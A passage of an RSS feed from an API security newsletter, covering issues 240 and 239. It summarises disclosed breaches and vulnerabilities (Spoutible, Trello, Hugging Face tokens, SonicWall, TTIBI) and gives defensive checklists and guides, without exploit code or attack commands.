<p>The post <a href="https://apisecurity.io/issue-241-two-critical-flaws-in-fortisiem-product-making-public-apis-private-api-security-strategy/">Issue 241: Two critical flaws in FortiSIEM product, making public APIs private, API security strategy</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 240: Spoutible API leakage, 15M Trello profiles scraped, API secret tokens leaked</title>
		<link>https://apisecurity.io/issue-240-spoutible-api-leakage-15m-trello-profiles-scraped-api-secret-tokens-leaked/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 22 Feb 2024 13:06:49 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11054</guid>

					<description><![CDATA[<p>This week, we have news of a record four API security related incidents. The first comes from Troy Hunt on a leakage on the new Spoutible social media site, with the second big ticket item being the leakage of 15 million profiles on Atlassian’s Trello. There’s also a report on the leakage of over 18,000 [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-240-spoutible-api-leakage-15m-trello-profiles-scraped-api-secret-tokens-leaked/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-240-spoutible-api-leakage-15m-trello-profiles-scraped-api-secret-tokens-leaked/">Issue 240: Spoutible API leakage, 15M Trello profiles scraped, API secret tokens leaked</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><span style="font-weight: 400;">This week, we have news of a record four API security related incidents. The first comes from Troy Hunt on a leakage on the new Spoutible social media site, with the second big ticket item being the leakage of 15 million profiles on Atlassian’s Trello. There’s also a report on the leakage of over 18,000 API tokens and the leakage of Office 365 accounts via a misconfigured server. We also feature a guide on implementing basic authentication on Spring Boot.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Vulnerabilities in Spoutible API</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">The</span><a href="https://www.troyhunt.com/how-spoutibles-leaky-api-spurted-out-a-deluge-of-personal-data/" target="_blank" rel="noopener"><span style="font-weight: 400;"> first vulnerability this week</span></a><span style="font-weight: 400;"> comes to us from the founder of </span><a href="https://haveibeenpwned.com/About" target="_blank" rel="noopener"><i><span style="font-weight: 400;">Have I Been Pwned</span></i></a><span style="font-weight: 400;">, Troy Hunt, and features several significant vulnerabilities in the API of the new Spoutible social media platform. In Troy’s own words, “No way! No way!” — this is almost a case study on how not to implement an API. Let’s dig in — fasten your seatbelts.</span><a href="https://www.reversinglabs.com/blog/5-lessons-learned-from-the-huggingface-api-breach" target="_blank" rel="noopener"><span style="font-weight: 400;"><br style="font-weight: 400;" /></span></a></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The Spoutible API offers a standard service endpoint allowing a user to retrieve basic account information; in Troy’s case, this is:</span></p>
<pre><code>https://spoutible.com/sptbl_system_api/main/user_profile_box?username=troyhunt</code></pre>
<p style="font-weight: 400;">As expected, this endpoint returned some basic metadata such as name, id, and profile. Troy also noticed that it returned several PII fields, including email and phone numbers. Given that this endpoint took a username as a parameter, it meant that an attacker could scrape the emails and phone numbers of any user at will.</p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Whilst that’s already a significant issue, it gets much worse. He noticed that it also returned the Bcrypt password hash — no way, I hear you say. He verified that the hash did match his (deliberately weak) password. Whilst not quite as bad as exposing the password directly, this is the next best thing. Bcrypt is vulnerable when used to hash weak passwords, and since Spoutible allowed passwords as short as six characters, it was possible many user passwords were susceptible to being cracked. One can only speculate as to why the API developer felt that returning the Bcrypt hash was a good idea or even remotely useful to anyone other than a hacker. </span><a href="https://www.reversinglabs.com/blog/5-lessons-learned-from-the-huggingface-api-breach" target="_blank" rel="noopener"><span style="font-weight: 400;"><br style="font-weight: 400;" /></span></a></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">He then discovered that the API returned several 2FA values, including the secret (which would allow the regeneration of a new valid 2FA code) and a Bcrypt hash of the backup code. Since the code was only six digits, this was easy to reverse engineer using a Bcrypt cracker. Incredibly, there is one more little “No way” moment. He also discovered a value called </span><i><span style="font-weight: 400;">em_code,</span></i><span style="font-weight: 400;"> which turned out to be the validation code when resetting a password via email. The API was literally providing the information necessary to perform an account takeover. </span><a href="https://www.reversinglabs.com/blog/5-lessons-learned-from-the-huggingface-api-breach" target="_blank" rel="noopener"><span style="font-weight: 400;"><br style="font-weight: 400;" /></span></a></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Troy reached out to the founder (ironically on Twitter) to alert him of these vulnerabilities, and within four hours, the API had been redacted to eliminate these sensitive fields. The founder released a public statement detailing the incident, which is available </span><a href="https://help.spoutible.com/support/solutions/articles/150000174284-important-security-update?ref=troyhunt.com" target="_blank" rel="noopener"><span style="font-weight: 400;">here</span></a><span style="font-weight: 400;">. </span><a href="https://www.reversinglabs.com/blog/5-lessons-learned-from-the-huggingface-api-breach" target="_blank" rel="noopener"><span style="font-weight: 400;"><br style="font-weight: 400;" /></span></a></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This is a rather epic example of </span><a href="https://apisecurity.io/owasp-api-security-top-10/api3-excessive-data-exposure/" target="_blank" rel="noopener"><span style="font-weight: 400;">API 03:2019 — Excessive data exposure</span></a><span style="font-weight: 400;">. The obvious advice is to ensure that your API never returns any sensitive or security-related information. </span></p>
<h2><span style="font-weight: 400;">Breach: 15 million user profiles scraped from Trello</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">The </span><a href="https://www.darkreading.com/remote-workforce/atlassian-tightens-api-after-hacker-scrapes-15m-trello-profiles" target="_blank" rel="noopener"><span style="font-weight: 400;">other big news this week</span></a><span style="font-weight: 400;"> is the leakage of PII (usernames and emails) from the Atlassian-owned Trello platform. The breach is believed to have affected over 15 million users and potentially opened up opportunities for spear phishing attacks. Atlassian committed to improving its API security but stressed that no other user profile data was divulged. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">An attacker discovered that they could abuse an API that allowed for the sharing of Trello boards by submitting a target user’s email address. The API would then return a list of all boards associated with that email, which allowed them to associate usernames with the corresponding emails. Trello has since moved to restrict access to this API, and it can no longer be used to query arbitrary user profiles. Atlassian also intimated that all impacted emails had previously featured in breaches and thus were already in the public domain. Troy Hunt’s own research seemed to indicate this was the case based on </span><a href="https://haveibeenpwned.com/About" target="_blank" rel="noopener"><i><span style="font-weight: 400;">Have I Been Pwned</span></i></a><span style="font-weight: 400;"> data extracts.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">If you are a Trello user, I would suggest checking if you (like I was!) are on the list. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The lesson here is to be wary of public, unauthenticated APIs that allow the enumeration of parameters, as they can easily be weaponized against you.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Over 18,000 API secret tokens leaked</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">The </span><a href="https://securityboulevard.com/2024/01/methodology-how-we-discovered-over-18000-api-secret-tokens/" target="_blank" rel="noopener"><span style="font-weight: 400;">next article features the findings</span></a><span style="font-weight: 400;"> of the Escape Tech security research team on the prevalence of leaked API secret tokens. By analyzing over 189 million URLs, they found over 18,000 exposed API secrets, of which 41% were deemed to be highly critical, leading to financial risk to organizations. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The article describes the methodology used in the research, and the details will appeal to the technically minded. In determining the URLs to parse, they picked a set of popular domains and spidered out from the domain roots. They avoided parsing any government, educational, and health-related domains. The researchers acknowledge that their dataset is relatively small and may not be entirely representative.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The statistics are impressive — over 189 million URLs were scraped in 69 hours with 150 concurrent processes. The whole scanning engine was built by a single engineer in three days. Once the data was collected, it was sanitized using pattern matching and custom heuristics. Upon discovering a potential positive finding, the team reached out to the owner to alert them. The researchers emphasized the importance of reducing false positives to prevent unnecessary panic. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This is an illuminating piece of research and adds weight to many expert opinions that token leakage is emerging as a top threat to API security.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: API leakage reveals Office 365 account details</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;"><a href="https://www.theregister.com/2024/01/18/ttibi_office_buggy/" target="_blank" rel="noopener">Our final vulnerability</a> this week features some excellent research from Eaton Zveare detailing his work in identifying a vulnerable API that allowed access to an Office 365 account (and, with it, 650,000 sensitive emails). </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The researcher discovered that the Toyota Tsusho Insurance Broker India (TTIBI) provided a mobile application for calculating car insurance premiums. By analyzing the application behavior, he determined that the client sent an API request to the server to send an email using a standard “no-reply” service account email. Seeing that the API call used Bearer Authorization, he assumed that attempts to subvert this API would be unsuccessful without a token. To his surprise, he discovered that the API responded with a success status and also an email sending log. In the log, he found a Base64-encoded password for the associated email account. No way, I hear you say.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Using this password and the email address, he could use the Office 365 portal to access the email account and the 650,000 emails in the mail folders. Six months after his disclosure to TTIBI, the password had still not been changed, and he could still access the account. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This is a great example of two OWASP Top 10 API security blunders that are often associated with one another — </span><a href="https://apisecurity.io/owasp-api-security-top-10/api2-2023-broken-authentication/" target="_blank" rel="noopener"><span style="font-weight: 400;">API 02:2023 — Broken authentication</span></a><span style="font-weight: 400;"> and </span><a href="https://apisecurity.io/owasp-api-security-top-10/api3-excessive-data-exposure/" target="_blank" rel="noopener"><span style="font-weight: 400;">API 03:2019 — Excessive data exposure</span></a><span style="font-weight: 400;">. </span></p>
<h2><span style="font-weight: 400;">Guide: Securing APIs with Spring Boot</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">The Spring Boot Java-based framework is among the most popular for implementing APIs, and </span><a href="https://medium.com/javarevisited/spring-boot-securing-api-with-basic-authentication-bdd3ad2266f5" target="_blank" rel="noopener"><span style="font-weight: 400;">this guide provides details</span></a><span style="font-weight: 400;"> on how to implement basic authentication. Although basic authentication is not a preferred mechanism for API authentication, this guide illustrates many of the important techniques to enable authentication mechanisms on Spring Boot. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The steps are relatively simple and include: </span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Adding a custom controller that provides the endpoint to be secured.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Add a Basic Auth configuration class.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Add a filter, password encoder, and authentication endpoint.</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">If you are new to Spring Boot, this tutorial is an excellent starting point to learn the basics of authentication.</span></p>
<h2><span style="font-weight: 400;">Article: Protecting APIs from BOLA, BOPLA and BFLA</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Earlier this month, 42Crunch hosted Philippe de Ryck in a popular webinar on the </span><span style="font-weight: 400;"><a href="https://42crunch.com/webinar-top-things-you-need-to-know-about-api-security/" target="_blank" rel="noopener">top things you need to know about API security.</a> To accompany this webinar, they have </span><span style="font-weight: 400;">published a blog post </span><span style="font-weight: 400;">that provides nuggets from the discussion around <a href="https://42crunch.com/how-to-protect-apis-from-owasp-authorization-risks-bola-bopla-bfla/" target="_blank" rel="noopener">protecting against the following pervasive API threats</a>:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Broken Object Level Authorization (BOLA)</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Broken Object Property Level Authorization (BOPLA)</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Broken Function Level Authorization (BFLA)</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">As ever, Philippe’s advice is worth heeding when it comes to securing your APIs.</span></p>
<p>The post <a href="https://apisecurity.io/issue-240-spoutible-api-leakage-15m-trello-profiles-scraped-api-secret-tokens-leaked/">Issue 240: Spoutible API leakage, 15M Trello profiles scraped, API secret tokens leaked</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 239: Hugging Face API token breach, SonicWall firewalls exploit, Kubernetes API gateway guide</title>
		<link>https://apisecurity.io/issues-239-hugging-face-api-token-breach-sonicwall-firewalls-exploit-kubernetes-api-gateway-guide/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 08 Feb 2024 18:40:43 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11041</guid>

					<description><![CDATA[<p>This week, we have news of a recent API token breach affecting the popular Hugging Face AI portal and a vulnerability in the SonicWall firewall affecting 178,000 instances. We also have a comprehensive API security checklist and a guide on selecting the most suitable API gateway for Kubernetes environments. Finally, we have a practical guide [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issues-239-hugging-face-api-token-breach-sonicwall-firewalls-exploit-kubernetes-api-gateway-guide/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issues-239-hugging-face-api-token-breach-sonicwall-firewalls-exploit-kubernetes-api-gateway-guide/">Issue 239: Hugging Face API token breach, SonicWall firewalls exploit, Kubernetes API gateway guide</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><span style="font-weight: 400;">This week, </span><span style="font-weight: 400;">we have news of a recent API token breach affecting the popular Hugging Face AI portal and a vulnerability in the SonicWall firewall affecting 178,000 instances. We also have a comprehensive API security checklist and a guide on selecting the most suitable API gateway for Kubernetes environments. Finally, we have a practical guide on securing APIs using the Express framework and a pair of blogs from Dana Epp. </span></p>
<h2><span style="font-weight: 400;">Breach: Hugging Face AI platform exposes API tokens</span></h2>
<p style="font-weight: 400;"><a href="https://www.reversinglabs.com/blog/5-lessons-learned-from-the-huggingface-api-breach" target="_blank" rel="noopener"><span style="font-weight: 400;">This week&#8217;s main news</span></a><span style="font-weight: 400;"> is recent research indicating large-scale leakage of API tokens on the popular Hugging Face AI portal. </span><a href="https://www.forbes.com/sites/forbestechcouncil/2024/01/08/how-attackers-are-using-apis-to-target-your-business/?sh=4a87f5db4e1b" target="_blank" rel="noopener"><span style="font-weight: 400;"><br style="font-weight: 400;" /></span></a></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Hugging Face hosts over 500,000 AI models and 250,000 datasets for developers working on LLMs and Generative AI projects and can be thought of as the GitHub for AI developers. The platform provides an API and Python library to enable developers to access their models and data. Security researchers at Lasso Security discovered that this API opened three potential AI security vulnerabilities (see the newly released </span><a href="https://owasp.org/www-project-top-10-for-large-language-model-applications/assets/PDF/OWASP-Top-10-for-LLMs-2023-v1_1.pdf" target="_blank" rel="noopener"><span style="font-weight: 400;">OWASP Top 10 for LLM Applications</span></a><span style="font-weight: 400;">), namely:</span></p>
<ol style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><b>Supply Chain Vulnerabilities:</b><span style="font-weight: 400;"> the large-language model (LLM) application lifecycle can be compromised by vulnerable components or services in the same way applications are vulnerable to supply chain attacks. </span></li>
<li style="font-weight: 400;" aria-level="1"><b>Training Data Poisoning:</b><span style="font-weight: 400;"> training data can be tampered with, resulting in vulnerabilities or biases that compromise security, behavior, or biases.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Model Theft:</b><span style="font-weight: 400;"> Models represent potentially valuable intellectual property and can be the target of theft via exfiltration.</span></li>
</ol>
<p style="font-weight: 400;"><span style="font-weight: 400;">The researchers used fairly basic methods to exfiltrate API keys from both GitHub and the Hugging Face platform. Both offer a search capability and by using a suitable regular expression term, they could identify API keys in public repositories. In their research, they discovered a total of 1,681 valid tokens, including high-value organizations such as Meta, Microsoft, Google, and Vmware. The keys had sufficient access rights to access Meta-Llama, Bloom, Pythia, and HuggingFace repositories fully.</span><a href="https://www.forbes.com/sites/forbestechcouncil/2024/01/08/how-attackers-are-using-apis-to-target-your-business/?sh=4a87f5db4e1b" target="_blank" rel="noopener"><span style="font-weight: 400;"><br style="font-weight: 400;" /></span></a></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The following recommendations will minimize the likelihood of similar vulnerabilities in the future:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Do not store login information in public repositories </span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Use multiple API keys and rotate them </span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Be aware of third-party API usage</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">AI tools need to handle data securely</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">AI providers need to create trust in APIs and more</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">The other obvious recommendation is to ensure regular scans are run against repositories such as GitHub and Hugging Face to detect accidentally exposed tokens as early as possible, ideally before any adversary finds them.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: SonicWall firewall RCE vulnerability</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">The second vulnerability this week comes </span><a href="https://www.scmagazine.com/news/sonicwall-api-opens-178k-firewalls-to-attack" target="_blank" rel="noopener"><span style="font-weight: 400;">courtesy of research from Bishop Fox</span></a><span style="font-weight: 400;">, who discovered a pair of vulnerabilities in the API of SonicWall’s next-generation firewall 6 and 7 families of devices. The first, tracked as </span><a href="https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0003" target="_blank" rel="noopener"><span style="font-weight: 400;">CVE-2022-22274</span></a><span style="font-weight: 400;">, was disclosed in March 2022, while the second, </span><a href="https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0004" target="_blank" rel="noopener"><span style="font-weight: 400;">CVE-2023-0656</span></a><span style="font-weight: 400;">, was revealed in March 2023. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">For the technically minded, the research report from Bishop Fox </span><a href="https://bishopfox.com/blog/its-2024-and-over-178-000-sonicwall-firewalls-are-publicly-exploitable" target="_blank" rel="noopener"><span style="font-weight: 400;">makes an interesting read</span></a><span style="font-weight: 400;">. It covers the initial vulnerability analysis, the development of a proof-of-concept exploit, and live scans to identify affected systems. The root cause was &#8211; as is so often the case &#8211; a buffer overflow vulnerability relating to their use of the </span><i><span style="font-weight: 400;">__snprintf_chk()</span></i><span style="font-weight: 400;"> function. Their proof of concept exploit shows how an attacker could use this vulnerability to execute code capable of crashing the device – perfect for a denial of service attack against a firewall. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The researchers did note that the likelihood of an exploit in the real world was likely to be low since very specific combinations of hardware and firmware versions were necessary as preconditions for the exploit. The researchers also published a script on GitHub that allowed firewall users to determine if they were vulnerable to the exploit.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Their advice was to ensure that the web management interface (hosting the vulnerable endpoint) was either disabled or removed from the public network. Simultaneously, users of SonicWall firewalls are urged to upgrade to the latest firmware.</span></p>
<h2><span style="font-weight: 400;">Article: API security checklist </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">API security best practices and checklists are always popular with readers, and this week, </span><a href="https://www.getastra.com/blog/api-security/api-security-checklist/" target="_blank" rel="noopener"><span style="font-weight: 400;">we have a good checklist</span></a><span style="font-weight: 400;"> courtesy of pentest provider Astra. Their list of nine items includes the following:</span></p>
<ol style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><b>Use API keys and/or common authentication:</b><span style="font-weight: 400;"> Avoid username/password authentication on APIs under all circumstances since these are easily bypassed and are difficult to change.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Enforce transport layer security:</b><span style="font-weight: 400;"> Ensure that API data is encrypted in transit, both internally and externally, using TLS.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Add rate limits to APIs:</b><span style="font-weight: 400;"> Prevent abuse and misuse of your APIs by enforcing rate limiting on all endpoints, including those involving an account reset process.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Mitigate any exposure of data:</b><span style="font-weight: 400;"> Avoid exfiltrating excessive data. Instead, limit data to the minimum data required for the business function of the API.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Implement zero-trust security:</b><span style="font-weight: 400;"> Assume all APIs will be accessible regardless of perimeter and explicitly enforce authentication and authorization for all APIs.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Validate all user input for APIs:</b><span style="font-weight: 400;"> Never trust user-supplied input since this can be manipulated to leverage injection attacks or mass assignment vulnerabilities. </span></li>
<li style="font-weight: 400;" aria-level="1"><b>Encode all output from the API:</b><span style="font-weight: 400;"> If the API output is being rendered directly (such as to a web page), ensure that output is encoded appropriately to prevent cross-site scripting attacks.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Conduct regular API vulnerability scans:</b><span style="font-weight: 400;"> Run automated scans against API endpoints to identify common vulnerabilities. </span></li>
<li style="font-weight: 400;" aria-level="1"><b>Carry out API penetration testing:</b><span style="font-weight: 400;"> Use API penetration testing providers who have the specialist skills necessary to identify API vulnerabilities. </span></li>
</ol>
<p style="font-weight: 400;"><span style="font-weight: 400;">This is a useful checklist to run against your APIs; thanks to the team at Astra for contributing.</span></p>
<h2><span style="font-weight: 400;">Article: Choosing an API gateway for Kubernetes</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Next, we have </span><a href="https://thenewstack.io/how-to-choose-the-right-fit-for-your-kubernetes-api-gateway/" target="_blank" rel="noopener"><span style="font-weight: 400;">a guide from The New Stack</span></a><span style="font-weight: 400;"> on selecting the most suitable API gateway for your Kubernetes installations. Although focused on the capabilities of Ambassador’s Edge Stack, the guide gives useful selection criteria and guidance for selecting a solution.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">If you are selecting a Kubernetes API gateway, you should look for Kubernetes-centric integrations; security and scalability; and operational ease, monitoring, and high performance. Whilst more conventional standalone gateways can be utilized in a Kubernetes environment, tighter integrations provide a better experience and greater functionality.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Deeper Kubernetes integration covers the following:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Service discovery and dynamic routing: the gateway should automatically identify and interact with Kubernetes services.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Native Kubernetes resource utilization: Leverage pods and ingress to achieve tight integration.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Real-time responsiveness: Dynamically scale to cluster changes and adapt to changing environments.</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">For scalability and enhanced security, consider the following aspects:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Elastic scalability: the gateway should be able to respond dynamically to traffic spikes and low-traffic periods.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Load distribution: distribute workload across multiple environments and regions.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Advanced security controls: leverage powerful authentication methods, SSL/TLS management, and rate limiting. </span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">DDoS mitigation.</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">Finally, for operational ease and performance, consider the following aspects:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Intuitive user interface.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Declarative configuration: since Kubernetes is typically configured declaratively, it makes sense that the gateway should support the same. </span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Traffic insights: Provide granular traffic data and logs.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Performance: Low latency is required for optimal user experience and scalable access. </span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">There are some specific requirements for APIs, including:</span></p>
<ul>
<li><b>Diverse protocol handling:</b><span style="font-weight: 400;"> it may be advantageous to have a gateway that can convert between protocols such as REST, WebSockets, and gRPC.</span></li>
<li><b>SSL termination and encryption management: </b><span style="font-weight: 400;">centrally manage certificates for ease of use.</span></li>
<li><b>API publishing and documentation:</b><span style="font-weight: 400;"> provide a central location for API documentation and available API inventory.</span></li>
<li><b>Service mesh integration.</b></li>
<li><b>Automation and CI/CD integration:</b><span style="font-weight: 400;"> Improves integration into existing DevOps processes.</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">An API gateway is an essential element in your API security armory; keep this guide in mind if you use Kubernetes.</span></p>
<h2><span style="font-weight: 400;">Guide: Securing APIs built with Express</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">For readers with a development perspective, </span><a href="https://securityboulevard.com/2024/01/how-to-secure-apis-built-with-express-js/" target="_blank" rel="noopener"><span style="font-weight: 400;">this guide</span></a><span style="font-weight: 400;"> on how to build secure APIs with the Express framework. Express is the most common web framework for Node.js based applications. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The guide covers a broad spectrum of topics, including:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Input validation</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Output encoding</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">CSRF protection</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">SQL injection prevention</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Role-based access control (RBAC) using middleware</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Multi-factor authentication</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Password encryption and hashing</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Secure token-based authentication</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Secure password reset process</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Activity logging and monitoring</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Rate-limiting </span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">This is a good guide to hands-on security using Express –  worth bookmarking if you are an Express developer.</span></p>
<h2><span style="font-weight: 400;">Guide: Dana Epp on rate limiting and NoSQL injection</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Finally, we feature two more guides from Dana Epp. The first covers </span><a href="https://danaepp.com/rigorous-api-rate-limiting-testing" target="_blank" rel="noopener"><span style="font-weight: 400;">API rate limit testing</span></a><span style="font-weight: 400;">, and the second covers </span><a href="https://danaepp.com/bypassing-api-auth-using-nosql-injection" target="_blank" rel="noopener"><span style="font-weight: 400;">bypassing API authentication using NoSQL injection</span></a><span style="font-weight: 400;">.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The guide on bypassing API authentication bypassing using NoSQL injection was a fascinating read for me – like many; I perhaps had not fully appreciated the risks of injection attacks against NoSQL databases. As Dana’s guide shows, a skilled attacker can easily bypass authentication, shown here in meme form:</span></p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-11042" src="https://apisecurity.io/wp-content/uploads/2024/02/API-Hacker-Rabiit-300x285.jpg" alt="" width="455" height="432" srcset="https://apisecurity.io/wp-content/uploads/2024/02/API-Hacker-Rabiit-300x285.jpg 300w, https://apisecurity.io/wp-content/uploads/2024/02/API-Hacker-Rabiit-768x730.jpg 768w, https://apisecurity.io/wp-content/uploads/2024/02/API-Hacker-Rabiit.jpg 968w" sizes="auto, (max-width: 455px) 100vw, 455px" /></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">We have seen several mentions of rate limiting in this week’s edition, and the article from Dana gives an attacker’s perspective on how to test rate-limiting implementations to prevent outages to services. Be sure to test your rate limits to ensure they behave as you expect.</span></p>
<h2><span style="font-weight: 400;">Event: 42Crunch at API Summit in Austin</span></h2>
<p><a href="https://nordicapis.com/events/austin-api-summit-2024/" target="_blank" rel="noopener"><img loading="lazy" decoding="async" class="alignnone wp-image-11029" src="https://apisecurity.io/wp-content/uploads/2024/01/Nordic-APIs-Austin-API-Summit-700x200-2-300x86.png" alt="" width="499" height="143" srcset="https://apisecurity.io/wp-content/uploads/2024/01/Nordic-APIs-Austin-API-Summit-700x200-2-300x86.png 300w, https://apisecurity.io/wp-content/uploads/2024/01/Nordic-APIs-Austin-API-Summit-700x200-2.png 700w" sizes="auto, (max-width: 499px) 100vw, 499px" /></a></p>
<p>The <a href="https://nordicapis.com/events/austin-api-summit-2024/" target="_blank" rel="noopener" data-saferedirecturl="https://www.google.com/url?q=https://nordicapis.com/events/austin-api-summit-2024/&amp;source=gmail&amp;ust=1704995213914000&amp;usg=AOvVaw12vpv9dojHI5CW_cd9xWda">Austin API Summit 2024</a> is approaching fast! Don&#8217;t miss your chance to join us on March 12-13th in Austin, TX &#8211; to meet industry colleagues, get inspired, and gather knowledge about the technology, trends and best practices shaping today’s API economy.</p>
<p>The event includes a <a href="https://nordicapis.com/events/austin-api-summit-2024/#speakers" target="_blank" rel="noopener" data-saferedirecturl="https://www.google.com/url?q=https://nordicapis.com/events/austin-api-summit-2024/%23speakers&amp;source=gmail&amp;ust=1704995213914000&amp;usg=AOvVaw3ffHErpNbkRocCokytsfxB">fantastic lineup of speakers</a> who will discuss many different aspects and best practices of API design, security, documentation, management, and more.</p>
<p>To get a 15% discount please use the following coupon code &#8220;sponsor15&#8221;.</p>
